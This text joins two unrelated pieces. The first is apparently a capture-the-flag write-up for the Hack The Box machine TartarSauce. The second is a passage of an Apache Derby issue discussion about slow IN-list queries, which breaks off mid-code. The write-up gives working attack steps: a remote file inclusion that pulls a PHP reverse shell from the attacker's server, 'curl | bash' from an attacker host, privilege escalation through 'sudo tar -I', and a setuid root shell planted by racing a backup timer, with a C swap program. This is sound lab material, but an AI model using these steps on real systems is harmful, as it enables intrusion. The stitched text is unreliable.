#include <termios.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> int main( void ) { int fd; struct termios termios_p; speed_t speed; fd = open( "/dev/ser1", O_RDWR ); tcgetattr( fd, &termios_p); /* * Set input baud rate */ speed = 9600; cfsetispeed( &termios_p, speed ); tcsetattr( fd, TCSADRAIN, &termios_p); close( fd ); return EXIT_SUCCESS; }
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/c/cfsetispeed.html | CC-MAIN-2014-49 | refinedweb | 210 | 59.8 |
I wanted to do a Todo List web application that I could pass on to my kids to try. My goal was to give them an introduction to SQL, Web interfaces and Web templating.
For the Todo List application the Python Bottle Web Framework will be used. The Bottle library is a lightweight standalone micro web framework.
To store the Todo list items an SQLite database is used. SQLite is a file based server-less SQL (Structured Query Language) database which is ideal for small standalone applications.
Finally to build Web page, Python web templates will be used. The advantage of using web templates is that is reduces the amount of code written and it separates the presentation component from the backend logic.
Getting Started with Bottle
To install the Python bottle library:
pip install bottle
As a test we can make a program that has a home page (“/”) and a second page, then links can be put on each of the page to move back and forward.
The @route is a decorator that links a URL call, like “/” the home page to a function. In this example a call to the home page “/” will call the home_page() function.
In the home_page() and pages2() functions the return call is used to pass HTML text to the web browser. The anchor tag (<a) is used to define page links.
The run() function will start the Bottle micro web server on:
The output is below.
SQLite
The Python SQLite library is one of the base libraries that is installed with Python.
SQLite has a number of tools and utilities that help manage your databases. One useful light weight application is: DB Browser for SQLite. It is important to note that SQLite data can be view by multiple applications, but for edits/deletes only 1 application can be accessing SQLite.
For the Todo list we’ll start with a simple database structure using three fields:
- Category – this a grouping such as: shopping, projects, activities etc.
- theItem – this is the actual to do item
- id – an unique index for each item. (This will used later for deleting rows)
The Todo database can be created with the SQLite Brower, or in Python code. The code below creates that database, adds a todo table and then inserts some records.
import sqlite3 print("Create a todo list database...") conn = sqlite3.connect('todo.db') # Warning: This file is created in the current directory conn.execute("CREATE TABLE todo (category char(50), theitem char(100),id INTEGER PRIMARY KEY )") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Shopping','eggs')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Shopping','milk')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Shopping','bread')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Activities','snow tires')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Activities','rack lawn')") conn.commit() print("Database todo.db created")
The DB Browser can be used to view the newly created database.
Viewing the Data in Python
An SQL SELECT command is used to get all the records in the todo database. A fetchall() method is will return all the database rows in a Python tuple variable. Below is the code to write the raw returned data to a browser page.
# Send to raw SQL result to a Web Page # import sqlite3 from bottle import route, run @route('/') def todo_list(): conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("SELECT * FROM todo") result = c.fetchall() c.close() # note: the SQL results are an array of data (tuple) # send results as a string return str(result) run()
The output formatting can be improved by adding a sort to the SQL SELECT statement and then HTML code are be used to show category heading.
For small applications putting HTML code in the Python code is fine, however for larger web projects it is recommended that the HTML be separated out from the database or backend code.
Web Templates
Web templates allow you to separate the database and back end logic from the web presentation. Bottle has a built-in template engine called Simple Template Engine. I found it did everything that I needed to do. It’s possible to use other Python template libraries, such as Jinja, Mako or Cheetah, if you feel you need some added functionality.
The earlier Python code is simplified by removing the HTML formatting logic. A template object is created with a template name of sometime.tpl). An example would be:
output = template(‘make_table0‘, rows=result, headings = sqlheadings)
Where rows and headings are variable names that are used in the template file. The template file make_table0.tpl is in the working directory.
# # Build a To Do List with a Web Template # import sqlite3 from bottle import route, run, template @route('/') def todo_list(): # Send the output from a select query to a template conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("SELECT * FROM todo order by category, theitem") result = c.fetchall() # define a template to be used, and pass the SQL results output = template('make_table0', rows=result) return output run()
Templates are HTML pages with inline Python code. Python code can either be in blocks with a <% to start the block and a %> to end the block, or each line can start with %.
Two of the major differences of inline template Python code are:
- indenting the line of Python is not required or used
- control statements like : if and for need an end statement
A template that takes the SQL results and writes each row in a table would look like:
A template that take the SQL results and writes a category heading and lists the items would look like:
Include ADD and DELETE to the Templates
The next step is to include ADD and DELETE functionality.
For the DELETE functionality, a form is added to the existing template. A ‘Delete’ button is placed beside all the Todo items and the button passes the unique index id (row[2]) of the item. The form has a POST request with the action going to the page ‘/delete‘ on the Bottle Web Server.
For the ADD functionality, a new template is created and a %include call is put at the bottom of the main template. (You could also put everything in one file).
The main template now looks like:
The new item template uses a dropdown HTML element with some predefined category options (Activities, Projects and Shopping). The item text will displace 25 characters but more can be entered. Pressing the save button will generate a POST request to the “/new” URL on the Bottle server.
The new_todo.tpl file is:
Bottle Python Code with /add and /delete Routes
The final step is to include routes for the /add and /delete URL references.
The new_item() function gets the category and Todo item from the form in the new_todo template. If the request passes a non-blank item (request.forms.get(“theitem”) then an SQL INSERT command will add a row. The unique item ID is automatically included because this field is defined as an index key.
The delete_item() function reads the unique item id that is passed from the button to issue an SQL DELETE statement.
At the end of the new_item() and delete_item() function the user is redirected back to the home (“/”) page.
# # Build a Todo List # import sqlite3 from bottle import route, run, template, request, redirect, post # The main page shows the Todo list, /new and /delete references are called from this page @route('/') def todo_list(): conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("SELECT * FROM todo order by category,theitem ") result = c.fetchall() # in case column names are required colnames = [description[0] for description in c.description] numcol = len(colnames) # for now only the rows=result variables are used output = template('show_todo', rows=result, headings=colnames, numcol = numcol) return output # Add new items into the database @route('/new', method='POST') def new_item(): print("New Post:", request.body.read()) theitem = request.forms.get("theitem") newcategory = request.forms.get("newcategory") if theitem != "": conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("INSERT INTO todo (category,theitem) VALUES (?,?)", (newcategory,theitem)) conn.commit() c.close() redirect("/") # go back to the main page # Delete an item in the database @route('/delete', method='POST') def delete_item(): print("Delete:", request.body.read() ) theid = request.forms.get("delitem").strip() print("theid: ", theid) conn = sqlite3.connect('todo.db') c = conn.cursor() sqlstr = "DELETE FROM todo WHERE id=" + str(theid) print(sqlstr) c.execute(sqlstr) conn.commit() c.close() redirect("/") # go back to the main page run()
The application will look something like:
Final Clean-up
Some of the final clean-up could include:
- enlarge the database to include fields like: status, due date, who is responsible etc.
- add an “Are you sure?” prompt before doing adds and deletes
- verify double entries aren’t included
- include an edit feature
- make the interface slicker
If you want to speed up the performance PyPy can be used instead of the Python interpreter. To use Pypy (after you’ve installed it), you will need to install the pip and bottle:
pypy3 -m ensurepip --user pypy3 -mpip install bottle --user
Final Comments
As I was working on this I found a good BottleTutorial: Todo-List Application. This tutorial approaches the Todo list project differently but it is still a worthwhile reference. | https://funprojects.blog/2020/03/30/sqlite-bottle-todo-list/ | CC-MAIN-2022-40 | refinedweb | 1,555 | 63.8 |
Arduino Forum :: Members :: iceowl
Show Posts
Pages: [1]
1. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 05, 2013, 10:29:12 pm)
OK, the following works:
Using the multi-progmem-segment method
1) Store 64k of strings in PROGMEM_SEG2 (doesn't have to be exact or padded) denoted with a memory start location of 0x20000
2) Store ~64K of strings in PROGMEM_SEG3 denoted with memory start location of 0x30000
3) Store 20k of pointers to those strings in the lowest progmem space with PROGMEM_FAR which goes...I dunno where.
Please note that you cannot deposit into memory a chunk of data larger than 64k, at least not with the version of avr-gcc/ld in Arduino 1.0.3. I believe this will be different once we get to avr-gcc v4.7...someday...maybe.
The strings can be accessed thus:
Code:
#include <morepgmspace.h>

// wordNumber is the index into the array of strings called dictionary0;
// note that dictionary0 has data in both SEG2 and SEG3.
unsigned int index = pgm_read_word_far(GET_FAR_ADDRESS(dictionary0[0]) + wordNumber*2);
if (index < SEG2_DATA_SIZE) {  // SEG2_DATA_SIZE is a stand-in for the size of the 64k of strings in SEG2
  strcpy_PX(newWord, index, PROGMEM_SEG2_BASE);
}
else {
  strcpy_PX(newWord, index, PROGMEM_SEG3_BASE);
}
char* strcpy_PX(char* des, uint_farptr_t src, unsigned long base)
{
  unsigned long p = base + src;  // rebase the offset into the right 64k segment
  char* s = des;
  do {
    *s = pgm_read_byte_far(p++);
  } while (*s++);                // copy up to and including the terminating null
  return des;
}
Note that you cannot access the data in those SEG2/SEG3 locations through specification of an indexed addressing scheme like
Code:
unsigned int index = pgm_read_word_far(GET_FAR_ADDRESS(dictionary0[i]));
I have been utterly unsuccessful in storing and reading out of the SEG 1 location which is denoted with a memory start location of 0x10000. However, I can put 20k of char*s at wherever the attr PROGMEM_FAR puts it. I have to go back to look at the linker script (avr6.x) to see where that's being mapped to. I know it's going into .data (or maybe just past it...)
At least I understand what's happening now. If I try to put anything into PROGMEM_SEG1 I not only get errors trying to read it back, but the bootloader gives me a verification error - which is probably the root cause of the whole problem. I don't have it in me to look into the bootloader at this point... On to another problem!
Cheers to all
Joe
2. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 05, 2013, 01:52:57 am)
Hi and thanks all,
I did get my code to work tonight. I divided the data and pointers into 3 segments, each of which is less than 64k. There are 2 PROGMEM segments containing a bunch of explicitly initialized strings of the form:
Code:
#include <morepgmspace.h> // and associated mods to ldscript to accommodate the PROGMEM attrs
const char abcde[9] PROGMEM_SEG2 = "aardvark";
And also
Code:
const char fghij[4] PROGMEM_SEG1 = "ant";
And another segment full of pointers to those strings like this
Code:
const char* dictionary[10000] PROGMEM_SEG3 = {abcde, fghij, /* ... */};
I can pull the chars out of the various segments like this
Code:
char* myWordInSeg2 = GET_FAR_ADDRESS(dictionary[0]) + SEG2_OFFSET + index*sizeof(char*);
strcpy_Pseg2(localCharArray, myWordInSeg2);  // I wrote the copy to handle addressing from SEG 2
It works but I'm durned if I can figure out why...somewhere some 18/24-bit addressing is taking place via ELPM... I may just be lucky because my strings are all loaded sequentially. The char ptrs in SEG3 seem to me to be useless. I think I'm just getting into SEG2 and yanking out strings wantonly without guidance from the ptrs in the dictionary array. But somehow this is working. The fact that I don't understand it makes me nervous that it is not a rigorous solution and only works temporarily.
Anyway.. Onward to Arduweenie land,
Joe
3. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 04, 2013, 06:04:49 pm)
Hi Nick
Yes, I have seen in the code <pgmspace.h> and also <morepgmspace.h> where for machines that support ELPM, the macros pgm_read_xxx_far are mapped into ELPM calls instead of LPM.
However, I've yet to determine exactly how to use those. It does seem to work just fine when I have a single 64k block of flash data tagged with the attribute PROGMEM. I think this is true because the following works:
Code:
#include <avr/pgmspace.h>
//...(other includes)
char myString[10];
const char abc[] PROGMEM = "abc";
const char def[] PROGMEM = "def";
const char* abcdef[] PROGMEM = {abc, def};
// ... stuff
for (int i = 0; i < 2; i++) {
  strcpy_P(myString, (const char*)pgm_read_word(&abcdef[i]));  // cast the fetched address for strcpy_P
  Serial.println(myString);
}
Note that strcpy_P is defined in <avr/pgmspace.h>. Note also that I can address the array with a variable index, which does not seem to be true if you try to create a var in memory space mapped through other means - like the attributes PROGMEM_FAR and PROGMEM_SEGx as specified in <morepgmspace.h>. In those cases, the compiler seems to want a static situation where you do something like:
Code:
long_address = GET_FAR_ADDRESS(abcdef) + BASE_ADDRESS_OF_MEMORY_SECTION + whichElement*sizeof(int);
strcpy_whatever(myString, pgm_read_word(long_address));
I suppose 24-bit addressing (at least, 18-bit addressing) must exist even to accept an address in that upper 256k...
If I use multiple 64k flash sections or I just try to rely on 24-bit addressing by specifying
Code:
#include <morepgmspace.h>
const char myVar[/* 70k's worth */] PROGMEM_FAR = { /* ...a whole lot of stuff, more than 64k... */ };
then this does not work...
Code:
int abc = pgm_read_word(&abcdef[i]);
So I am unsure of the occasions when 24-bit addressing is supported by the current compiler/linker, and when it's not... As I said, it seems that with versions avr-gcc 4.6.2 and 4.7.2 it does not balk at the code which calls more than 64k. But I haven't yet figured out if I can actually make it work with my app. I still have to go back and de-Arduino-ize my Arduino code into pure AVR code to try that in another environment, like AVR-Eclipse or AVR-XCode, which support those compiler versions...
Cheers
Joe
4. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 04, 2013, 12:18:57 pm)
...from above
But the important thing to note is that PROGMEM designates that the linker put your data into a space that is 64k in size. If you try to specify data bigger than 64k it might actually compile, but your results are going to be erratic - at least mine were using 1.0.3. Another important thing to note is that the PROGMEM attribute puts the data in a certain place, and only in that place. If you have more than 64k of data, you can put some where PROGMEM says and that spot is 64k big, but then where do you put the rest, and how do you get to it?
Now, just for the sake of discussion - there are lots of flash memory sections, used for different things. You have the .text section, and the .data section, and lots of .fini1, .fini2,.finix...etc. Code and data is marked by the __attribute__((section(".blah"))) tag, and then there is a corresponding note in the linker script that says what to do with things that are in section ".blah".
Some have had success putting data in the section marked with the attribute ".fini7". The AVR documentation says this is a user-definable section, and you can certainly use it to put a 64k chunk. If you have more than 64k you need more than one section.
Well, after much weeping and gnashing of teeth I got a lot of help from this:
which explains how to set up several PROGMEM memory segments/sections. It pushes the static data into flash above the code itself, as is recommended by many. It also provides some code to address those sections. That method required not only an include called "morepgmspace.h" - and please note this is a modified version of Carlos Lamas's original - but also mods to the linker script "avr6.x", which is the script used for chips that have 256k of flash. Other chips will have different linker scripts.
With that combination of things, I could specify constant global vars with the tags: PROGMEM_SEG1, PROGMEM_SEG2, PROGMEM_SEG3. I can them address them separately through a variety of means. The linker script is modified to place the data in locations which begin at 0x10000, 0x20000, and 0x30000 respectively.
Given that combo of linker script changes and includes I could do the following in code given the way I specified the data above:
Code:
char wordIGot[50];
uint_farptr_t theUltimateAddress = GET_FAR_ADDRESS(myDictionary) + PROGMEM_SEGyadda_BASE_ADDRESS + (indexOfWord*sizeof(char*));
strcpy_Pyadda(wordIGot, pgm_read_byte_far(theUltimateAddress));
Note that I have not yet figured out which strcpy function to use with these addresses, so I wrote my own.
Apparently, this also works in some universe, but I have not yet got it to work:
Code:
#include <morepgmspace.h>
char myWord[50];
int theIndexOfTheWordIWant;
strcpy_PF(myWord, pgm_read_word_far(&myDictionary[theIndexOfTheWordIWant]));
What I have been unable to accomplish at this point is retrieving the char* pointers from the array of 10,000 pointers I specified as "dictionary[]" above.
Just for sake of example, I have stored 64k of strings in the memory noted with the attribute PROGMEM_SEG2. I have stored the 10000 pointers to that data in PROGMEM_SEG1.
I am presuming these char* pointers are all 16-bit, so that they are addresses to the char strings all WITHIN the same memory segment, and that I will have to do something of the order of:
Code:
#include <morepgmspace.h> // note this is the MODIFIED one available on avrfreaks.com, not the original from Carlos Lamas's website
uint16_t theLocalAddress = pgm_read_word_far(&dictionaryWhichIsInSeg1[whichWordDoIWant]);
//but as I mentioned the above line doesn't seem to work always, as you can't retrieve the dictionary address through variable indexing.
//In that case, you have to do this..
uint16_t theLocalAddress = pgm_read_word_far(GET_FAR_ADDRESS(dictionary) + PROGMEM_SEG1_BASE + whichWordDoIWant*sizeof(char*));
//but I'm not sure how well that works either
then
Code:
char* theRealAddress = pgm_read_word_far(theLocalAddress + PROGMEM_SEG2_BASE);
However, I think I may be in some sort of compiler optimization hell. It seems impossible to retrieve the pointers to the const char*s with pgm_read_word_far...but I can get to the words themselves, which are stored sequentially in PROGMEM_SEG2 and thus seem like one big long string.
I also ran into the perennial issue with the Mega2560 bootloader hanging...the new version of the bootloader hex does seem to work but I wind up with a problem on verification. It gives me a warning, but the code loads just fine.
If anyone followed all that, thanks much for your valuable time.
With kind regards
Joe
5. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 04, 2013, 12:18:34 pm)
Ok. Progress after many hours of bashing. I promised to report back, and I am.
Consider this my engineering notebook of sorts. I'm not trying to instruct you experts, but rather, just recording my experiences. I know I do not have a complete understanding yet but this is as far as I got. I need more info - particularly on memory sections and addressing. But Maybe this will be valuable to someone.
My application is that I am putting a dictionary of 10k words into an Arduino Mega2560 and accessing it through some means for display on an LCD. My IDE is (mostly) the Arduino 1.0.3, and I'm primarily using MacOSX v10.6. What I eventually got to work was on that system.
I also tried the compile/link/load sequence from the command line using avr-gcc 4.6.2 and 4.7.2. I tried the AVR environment on Eclipse and also on Mac XCode. Results varied in different ways with all those methods. In all cases I'm using the most recent version of avrdude (I forget which) that comes with 1.0.3, which is also what you get when you fetch it on MacOSX with MacPorts or Fink. It's the same version in all cases.
I'm pretty confident that the combination of 4.7.2 and XCodeAVR or EclipseAVR would give me an entirely different experience than the ArduinoIDE. However I didn't do more than blinky-with-big-global-vars on any of those because I didn't have the time/patience to go back and recast all my Arduino code in native AVR speak. However I was very successful in compiling and linking to a .hex that contained flash/global data structures larger than 64k. I did not attempt to access those, though.
Things learned:
There is a real 64k boundary for data today. Note that code is not as limited. The vector long jump table (which I guess is called a "trampoline table" in AVR speak) consists of 32-bit words and so could easily address much more than the 256k in the Mega. However, data access is limited by 16-bit pointer addressing, so the largest chunk is 64k. Now, there is a great exception to this. By concatenating bits from another register (RAMPZ) you can effectively create a 24-bit pointer for data, and this is done, partially, in some asm code available in multiple libraries out there. At the moment, on the version of the IDE we have, though you can specify multiple 64k byte clumps, you can't cross that boundary on any one array or data structure.
Future versions of avr-gcc seem to address this. Particularly, it appears that in 4.7.2 the compiler/linker is happy with larger-than-64k global defs. And let me say here - it's global defs that are not-changing that we are talking about at all times, because it goes into flash. If you say"
Code:
volatile int xyz = 123;
That gets put into RAM and is globally defined for all your code/ISRs. This is not what I'm saying. If I say
Code:
volatile int xyz PROGMEM_blahblah = 123;
The "volatile" piece is not particularly useful, far as I can tell. By specifying PROGMEM_... you're putting the data into flash, and as such, it has to be globally accessible because you can't put PROGMEM data into local vars. And as it's not changable this would be just as effective and apparently does exactly the same thing:
Code:
int xyz PROGMEM_blahblah = 123;
The problem with getting things to compile when you've got more than 64k in one chunk (and it will compile under certain circumstances) is that the rest of the system has no clue how to handle it, because the ptr to the globals is only 16 bits and there's nothing you can do about that. So you wind up with linker errors, and errors that show up in other places - in code you had nothing to do with. This is a sign of badness, and the signal that you need to accept your 64k limitation with happiness and move on. Because it will be solved at some point.
In the version of avr-gcc available in the Ar1.0.3 (I believe it's 4.3.2) distribution, the compiler balks at "certain" declarations/structures which when initialized reach over 64k. And this is a key point - most of the problems surface in the "initialization" of defined vars, and not in the definition itself.
By the way, you can happily define/allocate empty vars to your heart's content. This is a red herring, though, I have found. In a lot of the tests run here, and also ones I've tried, you can play various games to get the compiler to NOT optimize away unused/uninitialized space. But the results are variable.
First, let me indicate we are talking about data in flash. For all intents and purposes, data in flash may as well be data in a ROM. Yes, I know there are ways to modify it during runtime, but that goes beyond what I have tried here.
As the flash data is essentially in a ROM, it is not unreasonable to expect that you would know what it was apriori. That is - you're going to burn it into flash, so you're certain what the data is. Therefore, all vars/data going into flash are known ahead of time and the compilers/linkers presume as much. This is an important point, and also one which is the source of a lot of pain. You can do the following in your code:
Code:
const char abc[] PROGMEM_blahBlah = "abc"; // PROGMEM_blahblah to be explained
And the abc will become abc[4] after compilation - that is, three chars 'a','b','c' and a trailing null '\0'. Please note that the compilers presume that declaration/initialization is intended to define a string. You don't get to come back later and say - hey, there's only 3 chars I didn't mean for it to be a null-terminated string. Too bad. The compiler is helping you. If you want a 3 char array you say:
Code:
const char abc[3] PROGMEM_blahBlah = {'a','b','c'};
and you get that. But in the determination of your memory usage you may be thrown off when the compiler tries to help you by adding another byte. In addition, when you're doing pointer arithmetic, you can't (always) address things in various parts of flash. For instance, depending on how you organized things this gives you garbage:
Code:
int aa[3] PROGMEM_yak = {1, 2, 3};
int fetchedInt;
for (int x = 0; x < 3; x++) {
  fetchedInt = pgm_read_word_far(&aa[x]);
  printf("%d=%d\n", x, fetchedInt);
}
where this will work
Code:
int aa[3] PROGMEM_yak = {1, 2, 3};
int a, b, c;
a = pgm_read_word(&aa[0]);
b = pgm_read_word(&aa[1]);
c = pgm_read_word(&aa[2]);
printf("a=%d,b=%d,c=%d\n", a, b, c);
Now in my app, I am defining 10,000 words in a way I can access them. I have tried several methods. I have tried putting them in a struct like this:
Code:
typedef struct {
  const char a[2];
  const char aardvark[9];
  //... etc 10k words
} words;

const words dictionary PROGMEM_blahblah = {
  {"a"}, {"aardvark"}, // etc, 10000 initializers
};
And that will compile just fine with the current version of avr-gcc. However, it generates an error on versions 4.6.2 and 4.7.2 that says something to the effect of "internal error: report a bug ..."
Doing this
Code:
typedef struct {
  const char a[2];
  const char aardvark[9];
  //... etc 10k words
} words;

const words dictionary PROGMEM_blahblah = {
  .a = "a",
  .aardvark = "aardvark",
  // etc, 10000 initializers
};
Will not compile on the current Arduino IDE but will compile on version 4.6.2 and v4.7.2.
I eventually settled on a different means - and this isn't entirely debugged. I'm still having trouble with the flash memory sections, but I did the following:
Code:
const char apple[6] PROGMEM_yadda = "apple";
const char bear[5] PROGMEM_yadda = "bear";
// etc. etc. etc. 10000 words
const char* dictionary[10000] PROGMEM_yadda+1 = {apple, bear /* , etc etc */};
The idea is that 64k of dictionary data is in a chunk of flash designated by the attribute "PROGMEM_yadda" and an array of pointers to that data is in a chunk of memory called "PROGMEM_yadda+1" (it may be obvious to most - but please don't try to create code with PROGMEM_yadda... that's just an example ) That compiles and links peachily.
Now - what I learned about PROGMEM is that as an attribute it specifies putting data into flash. Using PROGMEM is a multi-step process. You have to put it into your code, explicitly. But you also have to change the linker script to understand what you mean by that attribute. And then retrieving data stored via PROGMEM requires using accessors of the form
Code:
pgm_read_word_far(&myArray[i]);
...continued
6. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 02, 2013, 04:53:45 pm)
My problem appears to be this:
Quote
..it looks like the version of g++ used by Arduino will fail whenever the global constructors get pushed beyond the 64k limit, because the global constructor table is only 16bits wide and the code uses ijmp to access it...
Found here:
I'm compiling avr-gcc-4.7.2 right now just for grins, and I will try building outside the Arduino IDE environment to see if I can get it to load.
Ah, I had long forgotten the joys of code.
7. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 01, 2013, 04:48:52 pm)
Thanks Nick.
Yes, absolutely, a more intelligent data structure would be more compact and faster too.
Of course, even then there is the bald-faced challenge of trying to use up the whole 256k of the Mega....and once solved I'll also use tries and get even more packed in there!!!
Cheers
Joe
8. Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 (on: February 01, 2013, 02:55:27 pm)
OK, some experiments with Lefty's code. I generated some exhaustive initialization just to see what would happen.
Code:
const int arraysize = 3000; // value to mostly fill available flash capacity
long myInts0[arraysize] PROGMEM = { /* initializers */ };
long myInts1[arraysize] PROGMEM = { /* initializers */ };
//...
//...up to
long myInts9[arraysize] PROGMEM = { /* initializers */ };
What I've noticed is that if the sketch size goes over 128K I start getting errors of the form:
warning: internal error: out of range error...
That is, if I add an additional array of [arraysize] longs where arraysize = 3000, bringing the number up to 11 arrays, each of 3000 long elements = 4*11*3000 = 132K bytes (then add the rest of the sketch), I start getting that out-of-range error called on various libs. For instance, the first place it shows up is as an out-of-range error on the do_random function in random.o. If I comment out the call to random, it shows up in HardwareSerial.
If I stick to 10 initialized arrays the sketch size is 124,996 ( = 4*10*3000 + rest of sketch). No problems compiling/linking.
Now, interestingly, suppose that instead of longs I initialize each of the myInts arrays to 3000 four-byte null-terminated strings, thus:
Code:
char* myInts9[arraysize] PROGMEM ={"abc\0","abc\0","abc\0",//..etc for 3000 initializers
For 10 initialized arrays of 3000 four-byte-strings the IDE reports a sketch size of 64,646 bytes out of a 258,048 byte maximum. The same sketch initialized to longs is reported as 124,996.
For 20 initialized arrays of 3000 four-byte strings the IDE reports
arduino-1.0.3\hardware\arduino\cores\arduino/main.cpp:11: warning: internal error: out of range error
Binary sketch size: 136,682 bytes (of a 258,048 byte maximum)
If I take out 1 array I get no errors and
Binary sketch size: 130,646 bytes (of a 258,048 byte maximum)
I have not yet tried to load and run these sketches.
Cheers,
Joe
9 | Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 | on: February 01, 2013, 01:00:52 pm
Though slightly inconvenient that sounds vastly rational. In any case the dictionary I am trying to store is a static resource, so getting it set up correctly a-priori is no problem. Once it is set up, I won't change it. Hopefully in the future this will only get easier.
I will try it.
Joe
10 | Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 | on: February 01, 2013, 12:37:16 pm
Thanks for the code, Pyro.
That seems to definitely work to access the data in Flash.
The issue I seem to be facing from the outset happens where the declaration is:
prog_char abc[] = "hello world";
In my code, I am trying to create 10,000 prog_char var[]s. The size of all the strings in the 10,000 declarations combined is 75k. There would have to be at least 17 bits of addressing to accommodate that. Fortunately, it appears from all of the documentation that this is possible on the ATmega2560 chipset through the use of the RAMPZ register.
However, when I try to compile/link the code that contains the 10,000 lines of declarations, each of which is unique and looks like - prog_char foo[] = "bar"; -
the compiler/linker stage balks in the Arduino IDE. The error I get is that those declarations are too large to fit in 2 bytes of addressing.
Well, sure. It's just math and we all know you can't address 75K of data with only 16 bits. But there should be flags set in the appropriate places (like --relax in the linker) and defines for the compiler that make sure the addressing is set up correctly.
The issue I'm having is getting the data into the high memory in the first place. I'm absolutely certain that once it is there, we can use various functionality suggested kindly here to read it.
Thanks so much for putting up with my blather.
Joe
11 | Using Arduino / Programming Questions / Re: Just a newby asking the 64k question again - Arduino Mega2560 | on: February 01, 2013, 01:25:01 am
Hi and thank you all for the suggestions.
The suggestion to look into "morepgmspace.h" led to the AVR C runtime lib website and Carlos's code. It looks very instructive, though it is mostly runtime stuff (well, sure, of course). Now, I don't know enough about this platform to understand whether that code suggests you can load the flash dynamically (I thought that wasn't possible). Or perhaps the way I should read it is that I need to write my declaration code so it looks like it's being dynamically written, but actually it's being compiled, linked and uploaded like any normal sketch.
There is actually a bug fix update/change to pgmspace that was uploaded as recently as a few days ago. In that version, as opposed to the one in the 1.0.3 distribution, they extern a whole bunch of long address functions. They also deprecate a whole load of types.
Hemmerling's page says that for chips that have over 64k of flash - that the normal 16bit pointer scheme (plus RAMPZ, etc) allows addressing to 128k in 2 64k chunks.
I did indeed try to split my
const char* array[] {};
into two separate chunks, though it still thinks I'm trying to address flash beyond 64k with only the 16bit ptr, and the assembler balks.
I'm wondering if there isn't a define somewhere that I'm not taking advantage of. For instance - could it be that selecting "Mega2560 or Mega ADK" somehow isn't getting the right defines set somewhere so it isn't taking advantage of RAMPZ, or perhaps I'm just declaring stuff in a way that's braindead.
Most likely, I'm doing something braindead, and I expect there's a simple newbie mistake in my process that once I figure out will have me slapping my forehead into the wall... Discussion of how to address and read flash over 64k is everywhere. But how to write it at compile/link/load time is not.
That makes me think it should just happen easily, and I'm missing something obvious (as usual).
Thanks for the code snippets. I will try all avenues and report back if I have a breakthrough.
Best
Joe
12 | Using Arduino / Programming Questions / Just a newby asking the 64k question again - Arduino Mega2560 | on: January 31, 2013, 06:12:35 pm
Hi all and thanks in advance,
For the past week I have been scouring the web and this site with great interest in trying to answer the perennial question - can you store an array in PROGMEM that is larger than 64k bytes on the Mega2560?
My application is that I want to store a dictionary of 10,000 words in PROGMEM statically through compilation in the usual way prescribed here and in other places:
Code:
#include <avr/pgmspace.h>
const char* a_dict PROGMEM = "a";
const char* aa_dict PROGMEM ="aa";
const char* aaa_dict PROGMEM ="aaa";
const char* aaron_dict PROGMEM ="aaron";
const char* ab_dict PROGMEM ="ab";
const char* abandoned_dict PROGMEM ="abandoned";
const char* abc_dict PROGMEM ="abc";
//.
//.
//.
//etc 10,000 lines of words. The total size of all the characters+null termination bytes in all the words is 75.5k. ...then...
const char* dictionary[] PROGMEM = {a_dict, aa_dict,aaa_dict,aaron_dict,ab_dict,abandoned_dict,abc_dict // 10000 char* vars worth
};
//then some way to access the dictionary yet to be decided
void setup(){}
void loop(){
char* x; //a place holder for a recovered string
int index; //some sort of index
//something like strcpy_PF(x, (char*)pgm_read_word_far(&(dictionary[index])));
// yadda yadda, do something with x
}
The problem I run into is that the thing will not compile. I get an assembler error saying "Error: value of 68731 is too large to fit into 2 bytes at xyz", which of course is true for any number bigger than 2^16.
So I'm thinking there must be some secret incantation to get it to be understood that I need addressing to somehow be far/long/etc...somehow at least 1 bit more than 16 bits of addressing. It looks like by reading the various .h files and .cpp files in the avr libs that there is a register called RAMPZ that is used in the extension of the addressing to allow addressing more than 64K of flash. But how to get that to happen?
In all my reading I find a lot of info on how to access data placed above the 64k boundary - but nobody says how to get the compiler to put it up there in the first place. Is there a parameter? Is there a typedef I'm missing? Or does the compiler just do it for you when you set things up correctly?
Should I divide up my dictionary of words into 2 pieces, each less than 64k? Then perhaps I could do something like __attribute__((section(".someothersection"))); to get it to go in some other place?
Any guidance would be muchly appreciated.
Quite humbly,
Joe
Hack the Box Write-up #5: TartarSauce
In this write-up we’re looking at solving the retired machine “TartarSauce” from Hack The Box.
After spending some time on the hosted web applications, we'll eventually get the first foothold via an outdated WordPress plugin. From there we can upgrade to a user shell by abusing the tar command. Eventually, we get root by abusing tar once more, but this time as part of a backup script and in a bit more involved way.
Recon and Enumeration
As usual, we run our initial nmap scan
nmap -sV -sC -oN nmap/init 10.10.10.88
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
|   /webservices/tar/tar/source/
|   /webservices/monstra-3.0.4/
|   /webservices/easy-file-uploader/
|   /webservices/developmental/
|_  /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
While only getting back one open port, the listed entries in the robots.txt file do look promising.
